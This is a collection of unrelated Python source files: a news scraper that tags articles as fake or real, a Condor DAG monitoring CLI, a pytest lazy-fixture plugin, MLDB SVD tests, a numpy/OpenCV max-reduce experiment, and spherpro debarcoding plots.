        'ecoportal.net': ECOPORTAL,
        'europafm.com': EUROPAFM,
        'elconfidencialdigital.com': ELCONFIDENCIAL,
        'elinfobae.com': ELINFOBAE,
        'eleconomista.es': ELECONOMISTA,
        'ultimahora.com': ULTIMAHORA,
        'cadenaser.com': CADENASER,
        'publico.es': PUBLICO,
        'que.es': QUE,
        'fcinco.com': FCINCO,
    }
    return site_attributes.get(var, -1)
def get_all_news(path, is_fake, n):
    """Scrape every URL listed in the JSON file at *path*.

    The file maps site domains to lists of article URLs. Each article is
    written to src/data/articles/Article_<n>.json with a 'fake' flag set
    to *is_fake*. *n* is the running article counter; the updated value
    is returned so successive runs keep numbering contiguous.
    """
    urls_by_site = io.read_json_file(path)
    for site in urls_by_site.keys():
        css_attr = get_variable(site)
        if css_attr == -1:
            # Unknown domain: no scraping config, skip its URLs.
            continue
        for url in urls_by_site[site]:
            n += 1
            try:
                print('Making request of ...', url)
                article = make_request(url, css_attr)
                article['fake'] = is_fake
                out_path = 'src/data/articles/Article_' + str(n) + '.json'
                io.write_json_file(out_path, article)
                print('File saved!')
            except ValueError as err:
                print(err)
                print('Problem with: ', url)
    return n
def run(n):
    """Scrape every URL in list_url_2.json as real (non-fake) news,
    starting the article counter at *n*, and print the final counter."""
    source_path = 'src/data/list_url_2.json'
    final_count = get_all_news(source_path, False, n)
    print(final_count)
if __name__ == '__main__':
    # Starting article counter: output files are numbered from n + 1 on,
    # continuing after the articles produced by a previous run.
    n = 63
    run(n)
|
<filename>conwatch/WatchCmd.py<gh_stars>0
#!/usr/bin/env python
import time
import sys
import subprocess
import sqlite3
from ConWatchConfig import *
# Parsed command-line state (populated by init()).
cmd = ""       # the "-command" flag chosen by the user
cmdargs = []   # remaining positional arguments for that command
# SQLite handles (opened by init(), released by cleanup()).
conn = None    # sqlite3 connection to DB_FILE
c = None       # cursor on conn, shared by all command handlers
def listDAGs(cmdargs):
# Specify the condor_q command to run
condorcmd = ['condor_q', '-format', '\n%d ', 'ClusterId', \
'-format', '%s ', 'Cmd', \
'-format', '%s ', 'Iwd', \
'-format', '%d', 'DAGManJobId']
# Under high scheduler load, will get failure to connect error. In this case
# retry the query
count = 0
done = False
while ((count < CONDOR_RETRY) and (not done)):
print "Querying condor_q for DAGS"
p = subprocess.Popen(condorcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
joblist = p.communicate()[0]
retcode = p.returncode
if retcode != 0:
print "condor_q failure, retcode=" + str(retcode)
count = count + 1
print "Waiting " + CONDOR_WAIT + " secs, then retrying"
time.sleep(CONDOR_WAIT)
else:
done = True
if (not done):
joblist = []
else:
joblist = joblist.splitlines()
print "Top-level DAGs running in Condor:"
found = 0
for j in joblist:
tokens = j.split()
if ((len(tokens) == 3) and (tokens[1].find(CONDOR_DAGMAN) != -1)):
print tokens[0], tokens[2]
found = found + 1
if (found == 0):
print "None found."
return 0
def listWatchList(cmdargs):
try:
c.execute("select * from dags where not status = ?", (STATUS_DONE,))
daglist = c.fetchall()
print "DAGs in Watch List:"
if (len(daglist) == 0):
print "No DAGs in watch list"
else:
for row in daglist:
print row
except:
print sys.exc_info()
return 1
return 0
def showErrors(cmdargs):
# Trim the .# if the user specified it
jobid = cmdargs[0].split(".")[0]
notify = cmdargs[1]
try:
print "Finding DAGs for jobid " + jobid + ":" + notify
c.execute("select dagid from dags where jobid = ? and notify_user = ?", (jobid, notify,))
daglist = c.fetchall()
if (len(daglist) == 0):
print "No DAGs found for jobid " + jobid + ":" + notify
return 1
else:
# dagid is first field
for dag in daglist:
dagid = dag[0]
print "Errors for dagid " + str(dagid) + " (" + jobid + ":" + notify + ")"
print "--------------------------------------------------------------"
c.execute('select * from jobs where dagid = ?', (dagid,))
errorlist = c.fetchall()
for error in errorlist:
print error
if (len(errorlist) == 0):
print "No errors found"
except:
print "Unable to list errors for DAG " + jobid + ":" + notify
print sys.exc_info()
return 1
# Save (commit) the changes
conn.commit()
return 0
def removeDAG(cmdargs):
# Trim the .# if the user specified it
jobid = cmdargs[0].split(".")[0]
notify = cmdargs[1]
try:
print "Finding all DAGs for jobid " + jobid + ":" + notify
c.execute("select dagid from dags where jobid = ? and notify_user = ?", (jobid, notify,))
daglist = c.fetchall()
if (len(daglist) == 0):
print "No DAGs found for jobid " + jobid + ":" + notify
return 1
else:
print "Removing all DAGs with jobid " + jobid + ":" + notify
# Note that there might be multiple rows since a job may have been submitted
# to Condor Watch more than once (in the case of a rescue DAG)
for dag in daglist:
# dagid is first field.
dagid = dag[0]
print "Deleting entries for dagid " + str(dagid)
c.execute('delete from jobs where dagid = ?', (dagid,))
c.execute('delete from dags where dagid = ?', (dagid,))
except:
print "Unable to remove DAGs for jobid " + jobid + ":" + notify
print sys.exc_info()
return 1
# Save (commit) the changes
conn.commit()
return 0
# Constants
# Dispatch table: command-line flag -> handler. Every handler takes the
# remaining command arguments and returns 0 on success, non-zero on error.
VALID_COMMANDS = {"-condordags": listDAGs, \
                  "-watchlist": listWatchList, \
                  "-errors": showErrors, \
                  "-removedag": removeDAG}
def init():
global conn
global c
global cmd
global cmdargs
# Get number of command-line arguments
argc = len(sys.argv)
# Check command line arguments
if (argc < 2):
print "Usage: " + sys.argv[0] + " <-command> [command arguments]"
print "Supported commands:"
print "\t-condordags"
print "\t-watchlist"
print "\t-errors <dagid> <user>"
print "\t-removedag <dagid> <user>"
return 1
# Parse command-line options
cmd = sys.argv[1]
if (argc >= 2):
cmdargs = sys.argv[2: argc]
else:
cmdargs = []
validcmds = VALID_COMMANDS.keys()
if (not cmd in validcmds):
print "Invalid command specified"
return 1
print "Command: " + cmd
print "Command Args: " + str(cmdargs)
if ((cmd == "-errors")or (cmd == "-removedag")):
if (len(cmdargs) != 2):
print "Jobid and user must be specified"
return 1
# Create DB connection
try:
conn = sqlite3.connect(DB_FILE)
except:
print sys.exc_info()
return 1
# Create cursor
c = conn.cursor()
return 0
def main():
    """Dispatch to the handler registered for the parsed command.

    init() has already validated cmd, so the lookup cannot fail.
    """
    handler = VALID_COMMANDS[cmd]
    handler(cmdargs)
    return 0
def cleanup():
    """Release database resources. Returns 0.

    Bug fix: only the cursor used to be closed; the sqlite3 connection
    itself was leaked. Close both now.
    """
    if (c is not None):
        c.close()
    if (conn is not None):
        conn.close()
    return 0
if __name__ == '__main__':
    # Parse arguments and open the DB; bail out on usage/DB errors.
    if (init() != 0):
        sys.exit(1)
    main()
    cleanup()
    sys.exit(0)
|
# -*- coding: utf-8 -*-
import copy
import sys
import types
from collections import defaultdict
import pytest
# True when running under Python 3; selects the string base type below.
PY3 = sys.version_info[0] == 3
# On Python 2, basestring covers both str and unicode.
string_type = str if PY3 else basestring
def pytest_configure():
    """Expose ``pytest.lazy_fixture`` as this plugin's public entry point."""
    pytest.lazy_fixture = lazy_fixture
@pytest.hookimpl(tryfirst=True)
def pytest_runtest_setup(item):
    """Patch the item's fixture-filling step so lazy fixtures get resolved.

    Rebinds ``item._request._fillfixtures`` to the wrapper produced by
    fillfixtures(), passing the original implementation so it can still be
    delegated to after lazy values are replaced.
    """
    if hasattr(item, '_request'):
        item._request._fillfixtures = types.MethodType(
            fillfixtures(item._request._fillfixtures), item._request
        )
def fillfixtures(_fillfixtures):
    """Return a replacement for ``FixtureRequest._fillfixtures``.

    The wrapper (1) materializes autouse fixtures that are not yet in
    ``item.funcargs``, (2) replaces LazyFixture parametrize values with the
    real fixture values — in dependency order, so a lazy value that refers
    to another parametrized name is resolved after it — and (3) delegates
    to the original implementation.
    """
    def fill(request):
        item = request._pyfuncitem
        fixturenames = item.fixturenames
        autousenames = item.session._fixturemanager._getautousenames(item.nodeid)
        # Set up autouse fixtures first so lazy values can rely on them.
        for fname in fixturenames:
            if fname not in item.funcargs and fname in autousenames:
                item.funcargs[fname] = request.getfixturevalue(fname)
        # Resolve lazy parametrized values, dependents after their deps.
        if hasattr(item, 'callspec'):
            for param, val in sorted_by_dependency(item.callspec.params, fixturenames):
                if is_lazy_fixture(val):
                    item.callspec.params[param] = request.getfixturevalue(val.name)
        _fillfixtures()
    return fill
@pytest.hookimpl(tryfirst=True)
def pytest_fixture_setup(fixturedef, request):
    """Resolve a LazyFixture used as a fixture param before setup runs."""
    val = getattr(request, 'param', None)
    if is_lazy_fixture(val):
        request.param = request.getfixturevalue(val.name)
def pytest_runtest_call(item):
    """Resolve any LazyFixture values still present in ``item.funcargs``
    just before the test body runs."""
    if not hasattr(item, 'funcargs'):
        return
    for name, value in item.funcargs.items():
        if is_lazy_fixture(value):
            item.funcargs[name] = item._request.getfixturevalue(value.name)
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
    """Track the collector currently creating items.

    normalize_call() needs a collection node on pytest < 3.6.0 (where
    ``Metafunc`` has no ``definition``); stash it in the module-global
    ``current_node`` for the duration of item creation.
    """
    global current_node
    current_node = collector
    yield
    current_node = None
@pytest.hookimpl(hookwrapper=True)
def pytest_generate_tests(metafunc):
    """After normal test generation, expand lazy-fixture parametrization.

    Both ``funcargs`` and ``params`` of the generated callspecs may carry
    LazyFixture values that need their own fixture closures; each kind is
    normalized in turn.
    """
    yield
    normalize_metafunc_calls(metafunc, 'funcargs')
    normalize_metafunc_calls(metafunc, 'params')
def normalize_metafunc_calls(metafunc, valtype, used_keys=None):
    """Replace ``metafunc._calls`` with the lazy-fixture-expanded version.

    Each callspec is run through normalize_call(), which may expand it
    into several calls; the results are concatenated in order.
    """
    expanded = []
    for callspec in metafunc._calls:
        expanded.extend(normalize_call(callspec, metafunc, valtype, used_keys))
    metafunc._calls = expanded
def copy_metafunc(metafunc):
    """Return a shallow clone of *metafunc* with an empty call list.

    The mutable bookkeeping attributes are copied individually so the
    clone can be re-parametrized without mutating the original.
    """
    clone = copy.copy(metafunc)
    clone.fixturenames = copy.copy(metafunc.fixturenames)
    clone._calls = []
    clone._ids = copy.copy(metafunc._ids)
    clone._arg2fixturedefs = copy.copy(metafunc._arg2fixturedefs)
    return clone
def normalize_call(callspec, metafunc, valtype, used_keys):
    """Expand one callspec whose *valtype* dict may hold LazyFixture values.

    For the first not-yet-processed lazy value: compute the fixture closure
    of the referenced fixture, re-run parametrization on a copied metafunc
    restricted to the extra fixture names, recurse over the newly generated
    calls, and return them. When no lazy value remains, return the callspec
    unchanged as a one-element list.
    """
    fm = metafunc.config.pluginmanager.get_plugin('funcmanage')
    used_keys = used_keys or set()
    valtype_keys = set(getattr(callspec, valtype).keys()) - used_keys
    for arg in valtype_keys:
        val = getattr(callspec, valtype)[arg]
        if is_lazy_fixture(val):
            # Closure lookup signature varies across pytest versions.
            try:
                _, fixturenames_closure, arg2fixturedefs = fm.getfixtureclosure([val.name], metafunc.definition.parent)
            except ValueError:
                # 3.6.0 <= pytest < 3.7.0; `FixtureManager.getfixtureclosure` returns 2 values
                fixturenames_closure, arg2fixturedefs = fm.getfixtureclosure([val.name], metafunc.definition.parent)
            except AttributeError:
                # pytest < 3.6.0; `Metafunc` has no `definition` attribute
                fixturenames_closure, arg2fixturedefs = fm.getfixtureclosure([val.name], current_node)
            # Only fixtures the callspec does not already carry are new.
            extra_fixturenames = [fname for fname in fixturenames_closure
                                  if fname not in callspec.params and fname not in callspec.funcargs]
            newmetafunc = copy_metafunc(metafunc)
            newmetafunc.fixturenames = extra_fixturenames
            newmetafunc._arg2fixturedefs.update(arg2fixturedefs)
            newmetafunc._calls = [callspec]
            fm.pytest_generate_tests(newmetafunc)
            # Recurse: the expansion may itself contain lazy values.
            normalize_metafunc_calls(newmetafunc, valtype, used_keys | set([arg]))
            return newmetafunc._calls
        used_keys.add(arg)
    return [callspec]
def sorted_by_dependency(params, fixturenames):
    """Yield ``(key, value)`` pairs of *params* ordered so that a lazy
    value referring to another parametrized name comes after the name it
    depends on; independent keys keep fixture-closure order."""
    independent = []
    dependents = defaultdict(list)
    for key in _sorted_argnames(params, fixturenames):
        value = params[key]
        if is_lazy_fixture(value) and value.name in params:
            # Depends on another parametrized key: queue under that key.
            dependents[value.name].append(key)
        else:
            independent.append(key)
    # Independent keys first, then each one's dependency subtree.
    ordered = list(independent)
    for root in independent:
        ordered.extend(_tree_to_list(dependents, root))
    return [(key, params[key]) for key in ordered]
def _sorted_argnames(params, fixturenames):
argnames = set(params.keys())
for name in fixturenames:
if name in argnames:
argnames.remove(name)
yield name
if argnames:
for name in argnames:
yield name
def _tree_to_list(trees, leave):
lst = []
for l in trees[leave]:
lst.append(l)
lst.extend(
_tree_to_list(trees, l)
)
return lst
def lazy_fixture(names):
    """Wrap a fixture name (or an iterable of names) in LazyFixture markers.

    A single string yields one LazyFixture; any other iterable yields a
    list of LazyFixtures, one per name.
    """
    if isinstance(names, string_type):
        return LazyFixture(names)
    return [LazyFixture(each) for each in names]
def is_lazy_fixture(val):
    """Return True when *val* is a LazyFixture marker."""
    return isinstance(val, LazyFixture)
class LazyFixture(object):
    """Marker holding the name of a fixture to be resolved lazily.

    Instances are placed into parametrize values and later replaced by the
    real fixture value (see fillfixtures / pytest_runtest_call).
    """

    def __init__(self, name):
        # name of the fixture to resolve via request.getfixturevalue
        self.name = name

    def __repr__(self):
        return '<{} "{}">'.format(self.__class__.__name__, self.name)

    def __eq__(self, other):
        # Bug fix: comparing against a non-LazyFixture used to raise
        # AttributeError (other.name); return NotImplemented so Python
        # falls back to the reflected comparison / False.
        if isinstance(other, LazyFixture):
            return self.name == other.name
        return NotImplemented

    def __ne__(self, other):
        # Python 2 (supported by this file, see string_type) does not
        # derive != from __eq__.
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result

    def __hash__(self):
        # Keep instances hashable: defining __eq__ alone removes the
        # default __hash__ on Python 3. Hash consistently with __eq__.
        return hash(self.name)
|
<filename>testing/MLDB-1937-svd-with-complex-select.py
#
# MLDB-1937-svd-with-complex-select.py
# <NAME>, 2016-09-14
# This file is part of MLDB. Copyright 2016 mldb.ai inc. All rights reserved.
#
import random
from mldb import mldb, MldbUnitTest, ResponseException
class MLDB1937SvdWithComplexSelect(MldbUnitTest):  # noqa
    """Regression tests for MLDB-1937: svd.train with non-trivial SELECTs."""

    @classmethod
    def setUpClass(cls):
        # 100 rows: column 'a' is a random int in [0, 100]; column 'b' is
        # one of three strings ('test' / 'TEST' / 'Lombric') picked by
        # rand % 3, giving three distinct string values across the dataset.
        dataset = mldb.create_dataset({
            "type": "tabular",
            "id": "data"
        })
        for r in range(100):
            rand = random.randint(0, 100)
            dataset.record_row(
                "r%d" % r,
                [["a", rand, 0], ["b", "test" if rand % 3 == 0 else "TEST" if rand % 3 == 1 else "Lombric", 0]]
            )
        dataset.commit()

    def test_svd_with_function_calls(self):
        """Training on `a, lower(b)` yields one column per distinct value."""
        # this is using the fact that SVD training on string values
        # creates a new sparse column for each string value seen
        mldb.put('/v1/procedures/train_svd', {
            "type": "svd.train",
            "params": {
                "trainingData": "select a, lower(b) from data",
                "rowOutputDataset": "svd_row_embedding",
                "columnOutputDataset": "svd_column_embedding",
                "modelFileUrl": "file://tmp/MLDB-1937-svd-with-complex-select.svd"
            }
        })
        # column rowName_, a, lower(b).stringEquals.test and lower(b).stringEquals.lombric
        self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 4)

    def test_svd_with_aritmetic_ops(self):
        """Arithmetic in the SELECT: `a + 2, b` keeps all 3 'b' values."""
        mldb.put('/v1/procedures/train_svd', {
            "type": "svd.train",
            "params": {
                "trainingData": "select a + 2, b from data",
                "rowOutputDataset": "svd_row_embedding",
                "columnOutputDataset": "svd_column_embedding"
            }
        })
        self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 5)

    def test_svd_with_column_expression(self):
        """COLUMN EXPR filters select which columns are trained on."""
        # rowCount() = 100 matches every column (all are fully populated).
        mldb.put('/v1/procedures/train_svd', {
            "type": "svd.train",
            "params": {
                "trainingData": "select column expr(where rowCount() = 100) from data",
                "rowOutputDataset": "svd_row_embedding",
                "columnOutputDataset": "svd_column_embedding"
            }
        })
        self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 5)
        # Restricting to the numeric column 'a' leaves a single column.
        mldb.put('/v1/procedures/train_svd', {
            "type": "svd.train",
            "params": {
                "trainingData": "select column expr(where columnName() = 'a') from data",
                "rowOutputDataset": "svd_row_embedding",
                "columnOutputDataset": "svd_column_embedding"
            }
        })
        mldb.log(mldb.query("select * from svd_column_embedding"))
        self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 1)
        # Restricting to the string column 'b' expands to its 3 values
        # (plus the row-name column).
        mldb.put('/v1/procedures/train_svd', {
            "type": "svd.train",
            "params": {
                "trainingData": "select column expr(where columnName() = 'b') from data",
                "rowOutputDataset": "svd_row_embedding",
                "columnOutputDataset": "svd_column_embedding"
            }
        })
        self.assertEqual(len(mldb.query("select * from svd_column_embedding")[0]), 4)
if __name__ == '__main__':
    # Run every MldbUnitTest case in this file via MLDB's test harness.
    mldb.run_tests()
|
#Is it possible to use numpy.ufunc.reduce over an iterator of ndarrays?
#I have a generator function that yields ndarrays (all of the same shape and dtype) and I would like to find the maximum value at each index.
#Currently I have code that looks like this:
def main():
    """Compare four ways of computing the element-wise maximum over a
    stream of warped image patches (the question posed in the comments
    above): functools.reduce with an out= partial, an explicit loop with
    np.maximum(..., out=...), ndarray.max(0) over copies, and
    np.maximum.reduce over a materialized list of the raw yields.
    """
    import numpy as np
    import cv2
    shape = (250, 300)
    # cv2.warpAffine takes dsize as (width, height); numpy shape is (rows, cols).
    dsize = shape[::-1]
    # Six 2x3 affine matrices: each warps the patch to a different pose.
    affmat_list = np.array([
        [[ 1.57351554e+00, 0.00000000e+00, 1.09061039e+02],
         [ -3.61827926e-01, 7.46059970e-01, 2.50669551e+01]],
        [[ 3.05754491e+00, 0.00000000e+00, 8.28024922e+01],
         [ -2.13866309e-01, 1.72124200e+00, 1.72744669e+02]],
        [[ 2.58008254e+00, 0.00000000e+00, 1.52155447e+02],
         [ -2.08041241e+00, 2.46195663e+00, 1.09493821e+02]],
        [[ 2.01791864e+00, 0.00000000e+00, 2.45704669e+02],
         [ -1.07590956e+00, 3.33499949e+00, 1.66233498e+02]],
        [[ 3.32012638e+00, 0.00000000e+00, 1.03847866e+02],
         [ -2.36557589e+00, 3.02063109e+00, 1.59907802e+02]],
        [[ 4.94371474e+00, 0.00000000e+00, 7.92717193e+01],
         [ -2.67846198e+00, 3.66854256e+00, 1.47888210e+02]]])
    # Per-warp weighting; all ones here, so scaling is a no-op.
    fx2_score = np.ones(len(affmat_list))
    # 19x19 weight patch (bell-shaped, symmetric).
    patch = np.array([
        [ 0.0014, 0.0016, 0.0017, 0.0019, 0.0020, 0.0021, 0.0022, 0.0023, 0.0023, 0.0023, 0.0023, 0.0023, 0.0022, 0.0021, 0.0020, 0.0019, 0.0017, 0.0016, 0.0014],
        [ 0.0016, 0.0017, 0.0019, 0.0021, 0.0022, 0.0023, 0.0024, 0.0025, 0.0026, 0.0026, 0.0026, 0.0025, 0.0024, 0.0023, 0.0022, 0.0021, 0.0019, 0.0017, 0.0016],
        [ 0.0017, 0.0019, 0.0021, 0.0023, 0.0024, 0.0026, 0.0027, 0.0028, 0.0028, 0.0028, 0.0028, 0.0028, 0.0027, 0.0026, 0.0024, 0.0023, 0.0021, 0.0019, 0.0017],
        [ 0.0019, 0.0021, 0.0023, 0.0025, 0.0026, 0.0028, 0.0029, 0.0030, 0.0031, 0.0031, 0.0031, 0.0030, 0.0029, 0.0028, 0.0026, 0.0025, 0.0023, 0.0021, 0.0019],
        [ 0.0020, 0.0022, 0.0024, 0.0026, 0.0028, 0.0030, 0.0031, 0.0032, 0.0033, 0.0033, 0.0033, 0.0032, 0.0031, 0.0030, 0.0028, 0.0026, 0.0024, 0.0022, 0.0020],
        [ 0.0021, 0.0023, 0.0026, 0.0028, 0.0030, 0.0032, 0.0033, 0.0034, 0.0035, 0.0035, 0.0035, 0.0034, 0.0033, 0.0032, 0.0030, 0.0028, 0.0026, 0.0023, 0.0021],
        [ 0.0022, 0.0024, 0.0027, 0.0029, 0.0031, 0.0033, 0.0034, 0.0036, 0.0036, 0.0036, 0.0036, 0.0036, 0.0034, 0.0033, 0.0031, 0.0029, 0.0027, 0.0024, 0.0022],
        [ 0.0023, 0.0025, 0.0028, 0.0030, 0.0032, 0.0034, 0.0036, 0.0037, 0.0037, 0.0038, 0.0037, 0.0037, 0.0036, 0.0034, 0.0032, 0.0030, 0.0028, 0.0025, 0.0023],
        [ 0.0023, 0.0026, 0.0028, 0.0031, 0.0033, 0.0035, 0.0036, 0.0037, 0.0038, 0.0038, 0.0038, 0.0037, 0.0036, 0.0035, 0.0033, 0.0031, 0.0028, 0.0026, 0.0023],
        [ 0.0023, 0.0026, 0.0028, 0.0031, 0.0033, 0.0035, 0.0036, 0.0038, 0.0038, 0.0039, 0.0038, 0.0038, 0.0036, 0.0035, 0.0033, 0.0031, 0.0028, 0.0026, 0.0023],
        [ 0.0023, 0.0026, 0.0028, 0.0031, 0.0033, 0.0035, 0.0036, 0.0037, 0.0038, 0.0038, 0.0038, 0.0037, 0.0036, 0.0035, 0.0033, 0.0031, 0.0028, 0.0026, 0.0023],
        [ 0.0023, 0.0025, 0.0028, 0.0030, 0.0032, 0.0034, 0.0036, 0.0037, 0.0037, 0.0038, 0.0037, 0.0037, 0.0036, 0.0034, 0.0032, 0.0030, 0.0028, 0.0025, 0.0023],
        [ 0.0022, 0.0024, 0.0027, 0.0029, 0.0031, 0.0033, 0.0034, 0.0036, 0.0036, 0.0036, 0.0036, 0.0036, 0.0034, 0.0033, 0.0031, 0.0029, 0.0027, 0.0024, 0.0022],
        [ 0.0021, 0.0023, 0.0026, 0.0028, 0.0030, 0.0032, 0.0033, 0.0034, 0.0035, 0.0035, 0.0035, 0.0034, 0.0033, 0.0032, 0.0030, 0.0028, 0.0026, 0.0023, 0.0021],
        [ 0.0020, 0.0022, 0.0024, 0.0026, 0.0028, 0.0030, 0.0031, 0.0032, 0.0033, 0.0033, 0.0033, 0.0032, 0.0031, 0.0030, 0.0028, 0.0026, 0.0024, 0.0022, 0.0020],
        [ 0.0019, 0.0021, 0.0023, 0.0025, 0.0026, 0.0028, 0.0029, 0.0030, 0.0031, 0.0031, 0.0031, 0.0030, 0.0029, 0.0028, 0.0026, 0.0025, 0.0023, 0.0021, 0.0019],
        [ 0.0017, 0.0019, 0.0021, 0.0023, 0.0024, 0.0026, 0.0027, 0.0028, 0.0028, 0.0028, 0.0028, 0.0028, 0.0027, 0.0026, 0.0024, 0.0023, 0.0021, 0.0019, 0.0017],
        [ 0.0016, 0.0017, 0.0019, 0.0021, 0.0022, 0.0023, 0.0024, 0.0025, 0.0026, 0.0026, 0.0026, 0.0025, 0.0024, 0.0023, 0.0022, 0.0021, 0.0019, 0.0017, 0.0016],
        [ 0.0014, 0.0016, 0.0017, 0.0019, 0.0020, 0.0021, 0.0022, 0.0023, 0.0023, 0.0023, 0.0023, 0.0023, 0.0022, 0.0021, 0.0020, 0.0019, 0.0017, 0.0016, 0.0014]
    ])
    def warped_patch_generator():
        """Yield the patch warped by each affine matrix, scaled by score.

        NOTE(review): `padded_patch` and `warped` are allocated ONCE and
        reused — every iteration yields the SAME `warped` array object,
        overwritten by the next cv2.warpAffine call. Consumers must
        either fold each item in immediately (the reduce/loop variants
        below) or copy it (`w.copy()` for dstimg4); `input_iter_`, which
        materializes the raw references, ends up with every element
        aliasing the final warp.
        """
        padded_patch = np.zeros(shape, dtype=np.float32)
        patch_h, patch_w = patch.shape
        warped = np.zeros(shape, dtype=np.float32)
        for count, (M, score) in enumerate(zip(affmat_list, fx2_score)):
            print(count)
            # Write the scaled patch into the top-left corner in place.
            np.multiply(patch, score, out=padded_patch[:patch.shape[0], :patch.shape[1]])
            cv2.warpAffine(padded_patch, M, dsize, dst=warped,
                           flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT,
                           borderValue=0)
            yield warped
            #yield warped
    # Variant 3: reduce with a partial that always writes into dstimg3.
    print("THREE")
    from six.moves import reduce
    import functools
    dstimg3 = np.zeros(shape, dtype=np.float32)
    maximum_partial = functools.partial(np.maximum, out=dstimg3)
    dstimg3 = reduce(maximum_partial, warped_patch_generator())
    # Variant 1: explicit loop, folding each warp in as it is produced.
    print("ONE")
    dstimg1 = np.zeros(shape, dtype=np.float32)
    print("ONE")
    for warped in warped_patch_generator():
        #dstimg1 = np.maximum(dstimg1, warped)
        np.maximum(dstimg1, warped, out=dstimg1)
    # Variant 4: copy every warp first, then take the max along axis 0.
    print("FOUR")
    input_copy_ = np.array([w.copy() for w in warped_patch_generator()])
    dstimg4 = input_copy_.max(0)
    # Variant 2: materialize the raw yields (no copies!) and ufunc-reduce.
    print("TWO")
    dstimg2 = np.zeros(shape, dtype=np.float32)
    input_iter_ = list((w for w in warped_patch_generator()))
    np.maximum.reduce(input_iter_, axis=0, dtype=np.float32, out=dstimg2)
    # Show where the loop result and the reduce-over-aliases result differ.
    x = np.where(dstimg1.ravel() != dstimg2.ravel())[0]
    print(dstimg2.take(x))
    print(dstimg1.take(x))
    # NOTE(review): the comparison result is discarded — presumably meant
    # to be printed or asserted.
    np.allclose(dstimg1, dstimg2)
    # Display the four results side by side.
    import matplotlib.pyplot as plt
    plt.figure(1)
    plt.subplot(221)
    plt.imshow(dstimg1)
    plt.subplot(222)
    plt.imshow(dstimg2)
    plt.subplot(223)
    plt.imshow(dstimg3)
    plt.subplot(224)
    plt.imshow(dstimg4)
    plt.show()
#I would have thought that I would be allowed to write something like this:
# dstimg = np.maximum.reduce(warped_patch_generator())
|
<reponame>BodenmillerGroup/spherpro<gh_stars>1-10
import colorcet
import matplotlib.colors as mcolors
import matplotlib.pyplot as plt
import pandas as pd
import spherpro.bromodules.plot_base as plot_base
import spherpro.db as db
# Axis / colorbar labels and title for the debarcoding-quality scatter plot.
LABEL_CBAR = "# of all cells with valid barcodes"
LABEL_Y = "# of cells with\nmost prominent barcode"
LABEL_X = "# of cells with second most prominent barcode"
PLT_TITLE = "Debarcoding Quality"
# Column used to color the scatter points (valid-barcode count per image).
CBAR_HUE = db.images.bc_valid.key
class PlotDebarcodeCells(plot_base.BasePlot):
    """Render a per-cell heatmask of debarcoding results for one image."""

    def __init__(self, bro):
        super().__init__(bro)

    def plot_debarcoded_cells(
        self,
        img_id,
        color_invalid="#F8F8F8",
        base_colormap=colorcet.glasbey,
        colorbar=False,
        ax=None,
        title=None,
        **kwargs,
    ):
        """Plot image *img_id* with one color per barcode condition.

        *color_invalid* becomes color 0 (cells without a valid barcode);
        condition ids 1..max index into *base_colormap*. Extra kwargs are
        forwarded to the heatmask plotter. Returns plt_heatplot's result.
        """
        # get the conditions of the block
        # NOTE(review): this subquery joins sampleblocks/conditions/images
        # with no filter on img_id, so `unicols` does not appear to be
        # restricted to this image's sample block — confirm intended.
        blockid = (
            self.session.query(db.sampleblocks).join(db.conditions).join(db.images)
        ).subquery()
        unicols = [
            c[0]
            for c in self.session.query(db.conditions.condition_id)
            .filter(db.conditions.sampleblock_id == blockid.c.sampleblock_id)
            .all()
        ]
        # Color 0 = invalid barcode; colors 1..ncol-1 = condition ids.
        cmap = [color_invalid] + base_colormap
        ncol = max(unicols) + 1
        mymap = mcolors.LinearSegmentedColormap.from_list("my_colormap", cmap, N=ncol)
        if title is None:
            title = f"ImgId: {img_id}"
        # TODO: get barcoding variable names from the debarcoding module.
        return self.bro.plots.heatmask.plt_heatplot(
            [img_id],
            "barcode",
            "ObjectStack",
            "object",
            title=title,
            transform=None,
            colorbar=colorbar,
            cmap=mymap,
            ax=ax,
            crange=[0, ncol - 1],
            **kwargs,
        )
class PlotDebarcodeQuality(plot_base.BasePlot):
    """Scatter plot of debarcoding quality: per image, the most prominent
    barcode count vs. the second most prominent, colored by valid count."""

    def __init__(self, bro):
        super().__init__(bro)
        # make the dependency explicit

    def quality_plot(self, filename=None, show=None, cm=None):
        """
        Plots a quality Plot for the debarcoding. This function requires
        a debarcoded dataset!
        Args:
            str filename: if specified, saves the plot to the location
            bool show: should plt.show be executed? default False
            cm: color map to use
        Returns:
            plt, ax from plot
        Raises:
            NameError: when the dataset has not been debarcoded yet.
        """
        if show is None:
            show = False
        if not self.bro.is_debarcoded:
            raise NameError("Please use a debarcoded dataset or debarcode this one!")
        # get data
        table, zeros = self._get_data()
        # plot data
        plt, ax = self._produce_plot(table, zeros, cm=cm)
        # Saving and showing are mutually exclusive here.
        if filename is not None:
            plt.savefig(filename)
        else:
            if show:
                plt.show()
        return plt, ax

    def _get_data(self):
        """Return (images table with a condition, count of images without).

        NOTE: `== None` / `.isnot(None)` are intentional SQLAlchemy
        expressions (rendered as IS NULL / IS NOT NULL) — do not "fix"
        them to `is None`.
        """
        q = self.data.main_session.query(db.images)
        zeros = q.filter(db.images.condition_id == None).count()
        q = q.filter(db.images.condition_id.isnot(None)).statement
        table = pd.read_sql_query(q, self.data.db_conn)
        return table, zeros

    def _produce_plot(self, data, zeros, cm=None):
        """Build the scatter plot; *zeros* is currently unused here."""
        fig, ax = plt.subplots()
        if cm is None:
            cm = plt.cm.get_cmap("winter")
        # y: top barcode count, x: runner-up count; points near the
        # diagonal indicate ambiguous debarcoding.
        y = data[db.images.bc_highest_count.key]
        x = data[db.images.bc_second_count.key]
        sc = ax.scatter(x, y, alpha=0.7, edgecolors="none", c=data[CBAR_HUE], cmap=cm)
        # Square axes with a shared upper limit and a y = x guide line.
        upper = max(x.max() * 1.1, y.max() * 1.1)
        ax.set_xlim([0, upper])
        ax.set_ylim([0, upper])
        # ax.legend()
        ax.grid(True)
        ax.set_aspect(1)
        plt.plot(
            [0, upper],
            [0, upper],
            "k-",
            c="grey",
            lw=1,
            alpha=0.5,
            label="_not in legend",
        )
        cbar = plt.colorbar(sc)
